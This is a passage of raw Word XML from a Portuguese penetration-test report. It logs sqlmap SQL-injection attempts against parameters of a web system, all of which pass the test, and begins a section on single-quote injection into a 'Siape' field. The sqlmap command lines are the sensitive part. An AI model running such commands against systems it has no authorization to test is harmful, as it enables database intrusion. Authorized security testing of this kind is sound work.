        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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 w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“validade” é o parâmetro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>que sofrerá tentativa de injeção</w:t>
      </w:r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 w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado: </w:t>
      </w:r>
      <w:r w:rsidR="00594AD8" w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>assou no teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>O parâmetro escolhido para teste de injeção SQL não é injetável conforme mostra a figura 18.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D0530" w:rsidRDefault="008D0530" w:rsidP="008D0530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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="4171950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19.jpe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0536AA" w:rsidRDefault="008D0530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19</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="000536AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>- Resultado exploração Sql Inejction via Sqlmap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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tentativa 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00594AD8" w:rsidRPr="003A39F6" w:rsidRDefault="008C6DC7" w:rsidP="00594AD8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>Alterar o comando</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizado nas tentativas anteriores</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> para incluir o parâmetro </w:t>
      </w:r>
      <w:r w:rsidRPr="000536AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>“vacina”</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Foi esperado que a aplicação fizesse o devido tratamento dos parâmetros.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="003A39F6" w:rsidRDefault="008C6DC7" w:rsidP="00594AD8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</w:rPr>
        <w:t>Tentar injeção de SQL n</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">o parâmetro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="000536AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>vacina</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r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  <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Comando</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: sqlmap –r params –p vacina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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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 w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">O comando “–r“ indica ao programa que as instruções do ataque </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>devem ser</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> carregadas no arquivo </w:t>
      </w:r>
      <w:r w:rsidRPr="000536AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>params</w:t>
      </w:r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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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 w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“-p”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> i</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ndica o parâmetro que deve ser injetado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="003A39F6" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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 w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“vacina” é o atributo que </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>sofrerá tentativa de injeção</w:t>
      </w:r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 w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resultado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00594AD8" w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00594AD8" w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>assou no teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>O parâmetro escolhido para teste de injeção SQL não é injetável conforme mostra a figura 19.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D0530" w:rsidRPr="003A39F6" w:rsidRDefault="008D0530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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="4112260"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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0.jpe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0536AA" w:rsidRDefault="008D0530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20</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="000536AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Resultado exploração Sql Injection via Sqlmap.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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tentativa 6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 xml:space="preserve">Alterar o comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">utilizado nas tentativas anteriores </w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">para incluir o parâmetro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="000536AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>cadastro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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</w:rPr>
        <w:t>Tentar injeção de SQL n</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">o parâmetro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>cadastro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r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i/>
          <w:iCs/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>omando</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: sqlmap -r params -p cadastro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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33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 w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">O comando “-r” indica ao programa que as instruções do ataque </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>devem ser</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> carregadas no arquivo params.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="003A39F6" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“-p” i</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ndica o parâmetro que deve ser injetado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="003A39F6" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33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 w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“cadastro” é o atributo que </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>sofrerá tentativa de injeção</w:t>
      </w:r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0536AA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 w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resultado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00594AD8" w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00594AD8" w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>assou no teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>O parâmetro escolhido para teste de injeção SQL não é injetável conforme mostra a figura 20.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="003A39F6" w:rsidRDefault="005A5292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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="4126865"/>
            <wp:effectExtent l="0" t="0" r="0" b="698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1.jpe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0536AA" w:rsidRDefault="005A5292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21</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="000536AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Resultado exploração Sql Injection via Sqlmap.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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tentativa 7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 xml:space="preserve">Alterar o comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">utilizado nas tentativas anteriores </w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>para incluir o par</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>â</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">metro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="000536AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>ok</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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</w:rPr>
        <w:t>Tentar injeção de SQL n</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">o parâmetro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>ok</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r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i/>
          <w:iCs/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>omando: sqlmap -r params -p ok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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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 w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>O comando “-r” indica ao progr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ama que as instruções do ataque devem ser</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> carregadas no arquivo </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB70B5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>params</w:t>
      </w:r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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“-p” in</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>dica o parâmetro que deve ser injetado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="003A39F6" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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 w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“ok” é o atributo que </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>sofrerá tentativa de injeção</w:t>
      </w:r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DB70B5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 w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resultado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00594AD8" w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00594AD8" w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>assou no teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>O parâmetro escolhido para teste de injeção SQL não é injetável conforme mostra a figura 21.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="003A39F6" w:rsidRDefault="00236FDF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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="4058285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2.jpe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DB70B5" w:rsidRDefault="005A5292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22</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00DB70B5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Resultado exploração Sql Injection via Sqlmap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Pr="006635A8" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5 </w:t>
      </w:r>
      <w:r w:rsidRPr="006635A8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tela Consulta Servidor - SQL Injection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>Tarefa realizada dia 18/04/16.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>Duração: 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ora</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> e 40</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>min</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>utos</w:t>
      </w:r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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objetivo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3A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Submeter entradas maliciosas no sistema através de injeção de códigos SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> na página de Consulta Servidor</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>na tentativa de forçar ações não autorizadas no sistema.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 xml:space="preserve">. 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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resultados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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tentativa 1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 xml:space="preserve">Verificar se o campo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006635A8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>Siape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> é vulnerável à injeção de código SQL fazendo uso da técnica de concatenação de aspas simples.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</w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00934569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Foi esperado que o sistema realizasse o tratamento do caractere aspa simples como um parâmetro regular da consulta.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</w:rPr>
        <w:t>Entrada:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
